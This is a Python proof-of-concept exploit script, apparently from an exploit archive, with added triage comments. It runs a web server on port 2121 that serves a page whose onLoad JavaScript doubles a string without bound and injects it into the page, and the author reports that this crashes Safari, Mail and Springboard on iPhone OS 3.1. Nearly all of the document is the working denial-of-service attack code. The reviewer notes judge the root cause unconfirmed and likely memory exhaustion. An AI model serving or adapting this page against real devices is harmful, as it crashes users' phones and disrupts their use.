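#!/usr/bin/python
#iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3
#this script acts as webserver, and causes Safari, as well as Mail and Springboard to crash
#all these apps crash after running this exploit on the iPhone. Unable to debug any of these processes as the gdb on my
#device is acting up, original iPhone is just too low memory to further test this exploit, so I am releasing it

# Exploit Title: iPhone Springboard Malformed Character Crash PoC
# Date: 3/15/2010
# Author: Chase Higgins
# Software Link: apple.com/iphone/
# Version: iPhone 2G, iPhone 3GS
# Tested on: iPhone OS 3.1, and iPhone OS 3.1.3
# CVE :
# Code : none

# Reviewer notes (triage):
# - Root cause is undiagnosed. The author reports the crashes but could not
#   attach a debugger, so the "Malformed Character" attribution in the title
#   is unconfirmed.
# - In the served script, `i` is never changed inside `while (i < 1000)`, so
#   the string doubles on every pass with no upper bound. The visible code
#   therefore cannot separate "these characters break a parser" from "the
#   page exhausts memory"; treat it as a denial-of-service report until a
#   crash log says otherwise.
# - Python 2 script: `html` is a byte string there. Under Python 3, send()
#   rejects a str argument.

import socket
import sys


def main():
    """Serve one fixed HTML page to every client that connects to TCP port 2121.

    Connections are handled one at a time in an endless loop: up to 1024
    bytes of the client's request are read and printed, the page is written
    back as-is (no HTTP status line or headers are sent), and the connection
    is closed. The function returns only by way of an exception such as
    KeyboardInterrupt.
    """
    # This is a non-raw literal, so Python (not JavaScript) resolves
    # \x4e\x5b\x01. The page as sent contains the raw characters 'N', '[' and
    # the control byte 0x01 inside the JavaScript string.
    html = """
    <html>
    <head>
    <script>
    function triggerCrash(){
        evil_div = document.getElementById('evilDiv');
        var evil_string = "\x4e\x5b\x01";
        i = 0;
        while (i < 1000){
            evil_string = evil_string + evil_string;
        }
        evil_div.innerHTML = evil_string;
    }
    </script>
    </head>
    <body onLoad="triggerCrash()">
    <div id="evilDiv">
    </div>
    </body>
    </html>
    """

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # '' binds every local interface, so the listener is reachable from
        # any network the host is attached to, not only loopback.
        s.bind(('', 2121))
        s.listen(1)
        while True:
            channel, _ = s.accept()
            try:
                # Parenthesised so the line parses on Python 2 and 3; with a
                # single argument Python 2 prints exactly what the statement
                # form printed.
                print(channel.recv(1024))
                channel.send(html)
            finally:
                # Release the client socket even when recv/send raises.
                channel.close()
    finally:
        # The original never closed the listening socket; release the port
        # on the way out.
        s.close()


main()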